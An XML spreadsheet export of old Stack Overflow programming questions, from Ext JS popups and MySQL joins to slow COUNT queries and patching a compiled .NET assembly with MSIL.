    <t xml:space="preserve">&lt;p&gt;I am using Ext JS to make a popup window, here is the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function popupImage(term, imageNumber){
    if(currentPopupWindow!=null){
        currentPopupWindow.close();
    }
    currentPopupWindow = new Ext.Window({
                layout      : 'fit',
                closeAction :'hide',
                plain       : true,
                constrain   : true,
                width: 300,
                border: false,
                html: "Blah blah content"&amp;lt;span onclick=\"currentPopupWindow.close();\"&amp;gt;cerrar&amp;lt;/span&amp;gt;"
            });
    currentPopupWindow.show(false, function(){
        var el = Ext.get("termimage");
        currentPopupWindow.setWidth(el.getWidth(true)+150);
    });
    currentPopupWindow.anchorTo(Ext.get("dictionarycontainer"), "tl");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In firefox this works fine. In IE7 it works, but always produces a javascript error saying "unspecified error". &lt;/p&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
&lt;h2&gt;EDIT&lt;/h2&gt;
&lt;p&gt;Removing the anchorTo line removes the error. I would still like to anchor to though so this isn't a great solution!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL - Need help to figure out multiple joins</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the following query to get the transactions from a table made to and from a user. I then want to retrieve the username for the sender_id and for the recipient_id. However I can only seem to get it for the recipient_id or the sender_id. Anyone have any ideas how I can get both.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT us.name, ta.amount, ta.recipient_id, ta.sender_id, ta.timestamp_insert
    	FROM  `transactions` AS ta
    	JOIN users AS us
    	ON ta.recipient_id=us.u_id
    	WHERE ta.sender_id =111111 OR ta.recipient_id = 111111
    	LIMIT 0 , 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Transactions Table Columns:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;transaction_id&lt;br /&gt;
tw_id&lt;br /&gt;
tw&lt;br /&gt;
sender_id&lt;br /&gt;
recipient_id&lt;br /&gt;
amount&lt;br /&gt;
timestamp_insert&lt;br /&gt;
timestamp_start 
timestamp_complete
transaction_status&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;User Table Columns:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;u_id, 
name&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Classic ASP: How to list activated sessions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there someway to get a list of activated sessions in classic ASP?&lt;/p&gt;
&lt;p&gt;I want to limit the number of simultaneus activated sessions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"scheduledTimerWithTimeInterval:" problem in cocos2d?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to developed a iPhone app by using cocos2d. I using "scheduledTimerWithTimeInterval" for calling a method that called a fixed time interval. But now time interval increases in gradually. for this reason the time is slow in gradually.
here is my code:    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (void) methodTime: (id) sender{
    NSTimer *rat =[NSTimer scheduledTimerWithTimeInterval:(.5) target:self selector:@selector(rotation:) userInfo:nil repeats:YES]; 
}
- (void) rotation:(NSTimer *)theTimer{
    NSLog(@"I m  # %i", i);
    i=i+10;   // Here , i is a global int variable.
    i=i % 1440;
    	if(i==0){
    		[theTimer invalidate];
    	}
    	else {
    	 int rotationNum=i;
    	Sprite *sp = [Sprite spriteWithFile: @"1.png"];
    	sp.position=cpv(220,180.5);
    	sp.rotation=rotationNum;
    	[self add:sp];		
    	}
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there an STL and UTF-8 friendly C++ Wrapper for ICU, or other powerful Unicode library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a good Unicode library for C++. I need:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Transformations in a Unicode sensitive way. For example sort all strings in a case insensitive way and get their first characters for index. Convert various Unicode strings to upper and to lower case. Split text at a reasonable position -- words that would work for Chinese and Japanese as well.&lt;/li&gt;
&lt;li&gt;Formatting numbers, dates in locale sensitive way (should be thread safe).&lt;/li&gt;
&lt;li&gt;Transparent support of UTF-8 (primary internal representation).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;As far as I know the best library is ICU. However, I can't find normal developer friendly API documentation with examples. Also as far as I see, it is not too friendly with
modern C++ design, work with STL and so on. Like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::string msg;
unistring umsg.from_utf8(msg);
unistring::word_iterator wi;
for(wi=umsg.words().begin(),n=0;wi!=usmg.words().wi_end(),n&amp;lt;10;++wi,++n) 
  ;
msg=umsg.substr(umsg.words().begin(),wi).to_utf8();
cout&amp;lt;&amp;lt;_("Five 10 words are ")&amp;lt;&amp;lt;msg;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a good STL friendly ICU wrapper released under Open Source license? Preferred is a license permissive like MIT or Boost, but others, like LGPLv2 compatible, are OK as well.&lt;/p&gt;
&lt;p&gt;Is there another high quality library similar to ICU?&lt;/p&gt;
&lt;p&gt;Platform: Unix/POSIX, Windows support is not required.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; unfortunately I wasn't logged in, so I can't make accept an answer. I have attached the answer by myself.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Transparent control backgrounds on a VB.NET gradient filled form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm filling the background of some VB.NET 2005 WinForms form with a nice pretty gradient fill (by overriding the OnPaint event). This works fine but the various labels etc on the form show with a solid background even after I set the BackColor to Color.Transparent. Setting the transparency key of the form itself seems to affect this but I cannot get the labels to have a truely transparent BackColor, is there an easy way to get around this or am I looking at custom controls etc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mySQL large text comparisson performance... best practices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a largish (~1.5M records) table that holds text strings of varying length for which I run queries against looking for matches:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE IF NOT EXISTS `shingles` (
  `id` bigint(20) NOT NULL auto_increment,
  `TS` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  `shingle` varchar(255) NOT NULL,
  `count` int(11) NOT NULL default '0',
  PRIMARY KEY  (`id`),
  KEY `shingle` (`shingle`,`TS`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=1571668;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My problem is that I need while I'm doing comparisons against this table I am constantly adding and removing data from it, so maintaining indexes is hard.&lt;/p&gt;
&lt;p&gt;I'm looking for best practices for managing the inserts in a timely fashion while maximizing the throughput for the selects. This process is running 24hrs a day and needs to be as quick as possible.&lt;/p&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; &lt;em&gt;To clarify, I'm doing one to one matches on the 'shingle' column, not text searches within it.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic types not equal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The code segment below prints out "The types ARE NOT the same.".  Why?  I am aware of the fact that using &lt;code&gt;interfaceOnMyType.GetGenericTypeDefinition()&lt;/code&gt; will solve the problem, but why should I have to do that?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Program
{
    static void Main(string[] args)
    {
    	var myType = typeof(Baz&amp;lt;&amp;gt;);
    	var interfaceOnMyType = myType.GetInterfaces().SingleOrDefault();
    	var exactType = typeof(IBar&amp;lt;&amp;gt;);
    	if (exactType == interfaceOnMyType)
    	{
    		Console.WriteLine("The types ARE the same.");
    	}
    	else
    	{
    		Console.WriteLine("The types ARE NOT the same.");
    	}
    	Console.ReadLine();
    }
}
interface IBar&amp;lt;T&amp;gt;
{
}
class Baz&amp;lt;T&amp;gt; : IBar&amp;lt;T&amp;gt;
{
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to get ID when you pass my ID</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a function that gets passed the document object like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;toggle( $('username') );
function Toggle(id)
{
  ///  ??
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I get the actual name of the object passed i.e. username?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Relative percentage UI control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need the user to set a number of percentage values which should always add up to 100%. What are standard ways to archieve this? I came up with the following:&lt;/p&gt;
&lt;p&gt;1) have a standard slider control for each value you need to set. Moving one slider will automatically adjust all the others so the sum will always come out as 100%. You can fix inidividual sliders with a checkbox displayed next to it. Only the remaining, "free", sliders will be adjustable.&lt;/p&gt;
&lt;p&gt;Pro: consists entirely of standard widgets users already know &lt;/p&gt;
&lt;p&gt;Con: lots of widgets, lots of screen real estate used, looks ugly when you have lots of sliders and thus low percentage values, normalization to 100% isn't immediately obvious.&lt;/p&gt;
&lt;p&gt;2) have a slider control with several sliding knobs.&lt;/p&gt;
&lt;p&gt;Pro: normalization is implicit and obvious because the length of the slider is fixed, relative weight is easy to see at a glance&lt;/p&gt;
&lt;p&gt;Con: non-standard, knobs can easily overlap each other, knobs aren't easy to fix, no obvious place to put a text/number representation for each interval/percentage&lt;/p&gt;
&lt;p&gt;3) display a standard pie chart.&lt;/p&gt;
&lt;p&gt;Pro: normalization is implicit and obvious, relative weight is easy to see&lt;/p&gt;
&lt;p&gt;Con: non-standard for interactive use, hard to make intuitive slice resizing work, no place to put a text/number representation for each slice&lt;/p&gt;
&lt;p&gt;4) ... ?&lt;/p&gt;
&lt;p&gt;I'm not happy with either of these hence my question here. Any better ideas? I'm dealing with 3-10 individual percentage values on a rich windows client (i.e. not web).&lt;/p&gt;
&lt;p&gt;cheers,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SÃ¶ren
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>"SELECT COUNT(*)" is slow, even with where clause</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to figure out how to optimize a very slow query in MySQL (I didn't design this):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT COUNT(*) FROM change_event me WHERE change_event_id &amp;gt; '1212281603783391';
+----------+
| COUNT(*) |
+----------+
|  3224022 |
+----------+
1 row in set (1 min 0.16 sec)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Comparing that to a full count:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select count(*) from change_event;
+----------+
| count(*) |
+----------+
|  6069102 |
+----------+
1 row in set (4.21 sec)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The explain statement doesn't help me here:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; explain SELECT COUNT(*) FROM change_event me WHERE change_event_id &amp;gt; '1212281603783391'\G
*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: me
         type: range
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 8
          ref: NULL
         rows: 4120213
        Extra: Using where; Using index
1 row in set (0.00 sec)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;OK, it still thinks it needs roughly 4 million entries to count, but I could count lines in a file faster than that!  I don't understand why MySQL is taking this long.&lt;/p&gt;
&lt;p&gt;Here's the table definition:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE `change_event` (
  `change_event_id` bigint(20) NOT NULL default '0',
  `timestamp` datetime NOT NULL,
  `change_type` enum('create','update','delete','noop') default NULL,
  `changed_object_type` enum('Brand','Broadcast','Episode','OnDemand') NOT NULL,
  `changed_object_id` varchar(255) default NULL,
  `changed_object_modified` datetime NOT NULL default '1000-01-01 00:00:00',
  `modified` datetime NOT NULL default '1000-01-01 00:00:00',
  `created` datetime NOT NULL default '1000-01-01 00:00:00',
  `pid` char(15) default NULL,
  `episode_pid` char(15) default NULL,
  `import_id` int(11) NOT NULL,
  `status` enum('success','failure') NOT NULL,
  `xml_diff` text,
  `node_digest` char(32) default NULL,
  PRIMARY KEY  (`change_event_id`),
  KEY `idx_change_events_changed_object_id` (`changed_object_id`),
  KEY `idx_change_events_episode_pid` (`episode_pid`),
  KEY `fk_import_id` (`import_id`),
  KEY `idx_change_event_timestamp_ce_id` (`timestamp`,`change_event_id`),
  KEY `idx_change_event_status` (`status`),
  CONSTRAINT `fk_change_event_import` FOREIGN KEY (`import_id`) REFERENCES `import` (`import_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Version:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ mysql --version
mysql  Ver 14.12 Distrib 5.0.37, for pc-solaris2.8 (i386) using readline 5.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there something obvious I'm missing?  (Yes, I've already tried "SELECT COUNT(change_event_id)", but there's no performance difference).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing in ASP.net MVC Beta 1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wring a unit test for a controller and here is my code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void DocumentController_IndexMethod_ShouldReturn_Documents()
    {
        DocumentsController c = new DocumentsController(_repository);
        ViewResult result = (ViewResult)c.Index("1");
        DocumentsController.DocumentsData data = (DocumentsController.DocumentsData)result.ViewData;
        Assert.IsNotNull(data.Documents);
        Assert.IsTrue(data.Documents.Count() &amp;gt; 0);
        Assert.IsNotNull(result);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm basically following along with Rob Conery's asp.net storefront application and realized that I can't use the RenderView method.  As shown I have tried the ViewResult method to create an instance of the view.  I'm getting this error:
Error   1	Cannot convert type 'System.Web.Mvc.ViewDataDictionary' to 'HomeOwners.Controllers.DocumentsController.DocumentsData'	C:\Documents and Settings\drmarshall\My Documents\Visual Studio 2008\Projects\HomeOwners\HomeOwners.Tests\DocumentsControllerTests.cs	61	54	HomeOwners.Tests&lt;/p&gt;
&lt;p&gt;Am I using the correct replacement method or am I missing something?&lt;/p&gt;
&lt;p&gt;I figured it out.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[TestMethod]
    public void DocumentController_IndexMethod_ShouldReturn_Documents()
    {
        DocumentsController c = new DocumentsController(_repository);
        ViewResult result = c.Index("1") as ViewResult;
        ViewDataDictionary dictionary = result.ViewData;
        DocumentsController.DocumentsData data = (DocumentsController.DocumentsData)dictionary["Documents"];
        Assert.IsNotNull(data.Documents);
        Assert.IsTrue(data.Documents.Count() &amp;gt; 0);
        Assert.IsNotNull(result);
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>rotate text from a horizontal to a vertical position</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to rotate text from a horizontal position to a vertical on a single point without using something like flash? So I would read the same text normally by tilting my head.&lt;/p&gt;
&lt;p&gt;I was thinking you can do this in jquery but couldn't find a plug in.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does my jQuery alert show twice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using jQuery. I have a problem when alerts the IDs of a list shows two times, instead of once.&lt;/p&gt;
&lt;p&gt;The list:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="testnav"&amp;gt;
    &amp;lt;li&amp;gt; &amp;lt;a href="#"&amp;gt;Page 1&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt; &amp;lt;a href="#"&amp;gt;Page2..&amp;lt;/a&amp;gt;
        &amp;lt;ul id="subnav"&amp;gt;
            &amp;lt;li id="content_1"&amp;gt;&amp;lt;a href="#"&amp;gt; Page3&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
        &amp;lt;/ul&amp;gt;
    &amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("li").click(function(){
    var current_id = $(this).attr('id');
    alert(current_id);
    // These alert two times, one is empty and another one is content_1
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why dopes the code alert two times? How do I make it execute a single time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good way to get started integrating ADFS with AzMan?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of any good screenscasts or documentation covering the integration Active Directory Federation Services (ADFS) with Authorization Manager (AzMan)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add a link stylesheet dynamically in the &lt;head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to add a link stylesheet reference to the head of a document ?&lt;/p&gt;
&lt;p&gt;I've found this code but it's not working with all browsers, it crashes my IE7 :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var ss = document.createElement("link");
ss.type = "text/css";
ss.rel = "stylesheet";
ss.href = "style.css";
document.getElementsByTagName("head")[0].appendChild(ss);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net: weird url parameter when implment meta refresh on header</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to implement Rick's adding meta refresh via header on this &lt;a href="http://www.west-wind.com/Weblog/posts/6841.aspx" rel="nofollow"&gt;article&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For some reason my url look like this &lt;/p&gt;
&lt;p&gt;&lt;a href="http://localhost/pickweb/" rel="nofollow"&gt;http://localhost/pickweb/&lt;/a&gt;(S(hp5mypqznxgquf45vzz4fi55))/Login.aspx&lt;/p&gt;
&lt;p&gt;What is this "(S(hp5mypqznxgquf45vzz4fi55))" in my url? Even if i remove the code in Rick's blog it still have that weird parameter.&lt;/p&gt;
&lt;p&gt;I implement Rick's code &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Response.AppendHeader("Refresh", "4; url=profile.aspx");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in my Master page.&lt;/p&gt;
&lt;p&gt;Jack&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP landmines in general</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What surprises have other people found with writing PHP web applications?  There's the well known and to be fixed issue with compile time class inheritance but I know of a couple others and wanted to try and build a list of the top gotcha's of the language.&lt;/p&gt;
&lt;p&gt;Note: &lt;/p&gt;
&lt;p&gt;I've held several positions as a Sr. PHP5 developer so PHP work pays my bills, this question is not meant to bust on PHP as a language as every single language I've worked with has some well known or not so well known surprises.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database as fileformat</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A niave beginners question about database design.&lt;br /&gt;
I have an app managing some logger data eg. 1000s of sequential measurements of time, voltage, current, temperature. In addition each sequence run has meta data (date, location, etc).&lt;br /&gt;
So I need a table for each set of measurements and a master table listing these tables and the meta data for each. &lt;/p&gt;
&lt;p&gt;A couple of questions:&lt;br /&gt;
This doesn't really use the fact that all the data tables are the same format - there is no 'array of tables' concept, does this mean anything?&lt;/p&gt;
&lt;p&gt;Would I just give each data table a unique name, put that in the main table as a column, then simply substitute it into the SQL select statement - or is there a better way?&lt;/p&gt;
&lt;p&gt;edit: The reason for many tables, one per run, is that there might be 10-100 runs each with many 1000s of measurements. If I want to display/query/delete just one run it seemed more natural to have each in it's own table.&lt;br /&gt;
It looks like this is a programmer mindset (everything should be collections of separate objects) the database approach seems to prefer - store everything together and use index/cross-references.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ CLI cryptic function call</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm trying to call a function that is a manged wrapper around an OCX object. Having great difficulty. Function is;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foo(System::Object ^% theBuffer)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where 'theBuffer' is an array of bytes. The template for the unmanaged OCX which 'foo' wraps is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;goo(VARIANT* theBuffer);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So I've tried;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System::Int32 buf[10];
foo(buf);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which fails. And&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Bitmap ^b;
foo(b);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which compiles but obviously the called function is not going to create a .NET bitmap for me. &lt;/p&gt;
&lt;p&gt;So I guess the question is how do I pass this function a block of memory it can write to and then get access to it back in .NET world.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What coding tricks have you used to avoid writing more sql?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question was suggested by &lt;a href="http://stackoverflow.com/users/5486/kyralessa"&gt;Kyralessa&lt;/a&gt; in the &lt;a href="http://stackoverflow.com/questions/488020/what-is-your-most-useful-sql-trick-to-avoid-writing-more-code"&gt;What is your most useful sql trick to avoid writing more sql?.&lt;/a&gt;   I got so many good ideas to try from the last question, that I am interested to see what comes up with this question.&lt;/p&gt;
&lt;p&gt;Once again, I am not keeping the reputation from this question.  I am waiting 7 days, for answers, then marking it wiki.  The reputation that the question has earned, goes into a bounty for the question.  &lt;/p&gt;
&lt;p&gt;Ground Rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;While it is certainly reasonable to write code, to move processing from SQL into the code to address performance issues, that is really not the point of the question.  The question is not limited to performance issues.   The goal is less simply less sql to get the job done.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Communicate the concept, so that other users say "Oh Wow, I didn't know you could do that."&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Example code is very useful, to help people that are primarily visual learners.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Explicitly state what Language you are using, and which dialect of SQL you are using.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Put yourself in your readers shoes.  What would they need to see right there on the screen in front of them, that will cause an epiphany.  Your answer is there to benefit the reader.  Write it for them.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Offsite links are ok, if they appear after the example.  Offsite links as a substitute for a real answer are not.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There are probably other things to make it nicer for the reader that I haven't thought of.  Get Creative. Share knowledge.  Have fun showing off.&lt;/p&gt;
&lt;p&gt;[EDIT] - It looks like there hasen't been any activity in a while.   5 votes = 50, so there is the bounty, and it has been wikified.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SmartPhone with a good SDK on Sprint PCS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For as long as mobile phones have been running third-party applications, I've wanted to try my hand at writing some.&lt;/p&gt;
&lt;p&gt;Now that it's coming time to replace my PalmOS-powered Treo 530, I'm looking to acquire a new phone that has a robust platform for third-party development. For contractual reasons, it must work on the Spring PCS network.&lt;/p&gt;
&lt;p&gt;Ideally, such a phone would have a well-documented API, a well-supported OS, and an emulator that will run under Windows XP or Fedora Core.&lt;/p&gt;
&lt;p&gt;Does anybody know of such a phone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specify default filegroup for indices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is puzzling me - in SQL Server 2005/2008, I can specify the default file group which is then used for all data tables. I can also specify another filegroup for all BLOB type fields.&lt;/p&gt;
&lt;p&gt;But I cannot figure out if and how I can specify a default filegroup for indices.....&lt;/p&gt;
&lt;p&gt;My setup usually is:
* primary filegroup - nothing but the system catalog - bare minimum
* DATA filegroup - which I make the default for my database
* INDEX filegroup for all indices
* BLOB filegroup (optional) for all BLOB data
* LOG (obviuosly)&lt;/p&gt;
&lt;p&gt;Now if I create all by tables and indices manually by script, of course I can specify the appropriate file group for each. But is there a way / trick / hack to make it possible to specify where to put the indices? When I use SQL Server Mgmt Studio to e.g. designate a column as primary key on a table, it creates a PK_(tablename) index - but unfortunately, it sticks that into the DATA filegroup, and once it's there, it seems I cannot change it anymore (in the visual designer).&lt;/p&gt;
&lt;p&gt;Am I missing something? Or has Microsoft just not provided such a setting??&lt;/p&gt;
&lt;p&gt;Thanks for any hints, pointers, leads!&lt;/p&gt;
&lt;p&gt;Marc&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an equivalent to the iSeries OVRDBF command in SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a requirement in a SQL environment that under specific circumstances, all references to table (or view) A in a procedure actually use table (or view) B.  On the iSeries I would have used the OVRDBF command to override references to table A with table B: OVRDBF FILE(A) TOFILE(B).  What would be the equivalent to this in SQL?  Is there one?  &lt;/p&gt;
&lt;p&gt;My goal is to end up with a procedure that is ignorant of the override.  I don't want conditional logic inside the procedure that directs processing at table B when certain conditions are met.  The vision:&lt;/p&gt;
&lt;p&gt;Under typical circumstances:  Just invoke the procedure&lt;/p&gt;
&lt;p&gt;Under specific alternative circumstances:  Perform the OVRDBF equivalent and then Invoke the procedure&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you return more than one DataTable from a method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have class which has a method that needs to return three DataTables.  I thought I could use Generics but honestly I've never used them, so I'm trying figure it out.  It may not be the right thing here.&lt;/p&gt;
&lt;p&gt;I have in my class Employee:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public List&amp;lt;Employee&amp;gt; GetEmployees()
{
  //calls to other methods in my class;
  //psuedocode
  GetDataTable1;
  GetDataTable2;
  GetDataTable3;
  return all three datatables;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On my presentation side I have three gridviews:&lt;/p&gt;
&lt;p&gt;I create my class Employee and call GetEmployees and get back my list of DataTable, then&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gridview1.datasource = datatable1;
gridview2.datasource = datatable2;
gridview3.datasource = datatable3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not sure how to proceed.  I have tried the class method definition above but I'm not getting it right.&lt;/p&gt;
&lt;p&gt;Hoping for advice.  I do not wish to use three methods.  I am using C# and asp.net 2.0.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Language detection in PHP ( UTF-8 )</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What code snippets are out there for detecting the language of a chunk of UTF-8 text? I basically need to filter a large amount of spam that happens to be in Chinese and Arabic. There's a PECL extension for that, but I want to do this purely in PHP code. I guess I need to loop through a Unicode string with a unicode version of ord() and then create some kind of a range table for different languages. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Computing the statistical mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently trying to verify whether or not, given an unsorted array A of length N and an integer k, whether there exists some element that occurs n/k times or more.&lt;/p&gt;
&lt;p&gt;My thinking for this problem was to compute the mode and then compare this to n/k. However, I don't know how to compute this mode quickly. My final result needs to be n*log(k), but I have no idea really on how to do this. The quickest I could find was n*k...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>gedit plugin development in python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know where information about writing gedit plugins can be found ? I'm interested in writing them in Python. I know of &lt;a href="http://live.gnome.org/Gedit/PythonPluginHowTo"&gt;Gedit/PythonPluginHowTo&lt;/a&gt;
 , but it isn't very good . Besides the code of writing a plugin that does nothing , I can't seem to find more information . I started to look at other people's code , but I think this shouldn't be the natural way of writing plugins . Can someone help ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I "subtract" one table from another?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a master table &lt;code&gt;A&lt;/code&gt;, with ~9 million rows. Another table &lt;code&gt;B&lt;/code&gt; (same structure) has ~28K rows from table &lt;code&gt;A&lt;/code&gt;. What would be the best way to remove all contents of &lt;code&gt;B&lt;/code&gt; from table &lt;code&gt;A&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;The combination of all columns (~10) are unique. Nothing more in the form a of a unique key.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatic MSIL injection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a buggy application like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("2 + 1 = {0}", Add(2, 1));
        }
        static int Add(int x, int y)
        {
            return x + x; // &amp;lt;-- oops!
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The application is already compiled and deployed into the wild. Someone has found the bug, and now they are requesting a fix for it. While I could re-deploy this application with the fix, its an extreme hassle for reasons outside of my control -- I just want to write a patch for the bug instead.&lt;/p&gt;
&lt;p&gt;Specifically, I want to insert my own MSIL into the offending assmembly source file. I've never done anything like this before, and googling hasn't turned up any useful information. If I could just see a sample of how to do this on the code above, it would help me out tremendously :)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How do I programmatically inject my own MSIL into a compiled .NET assembly?&lt;/strong&gt;&lt;/p&gt;
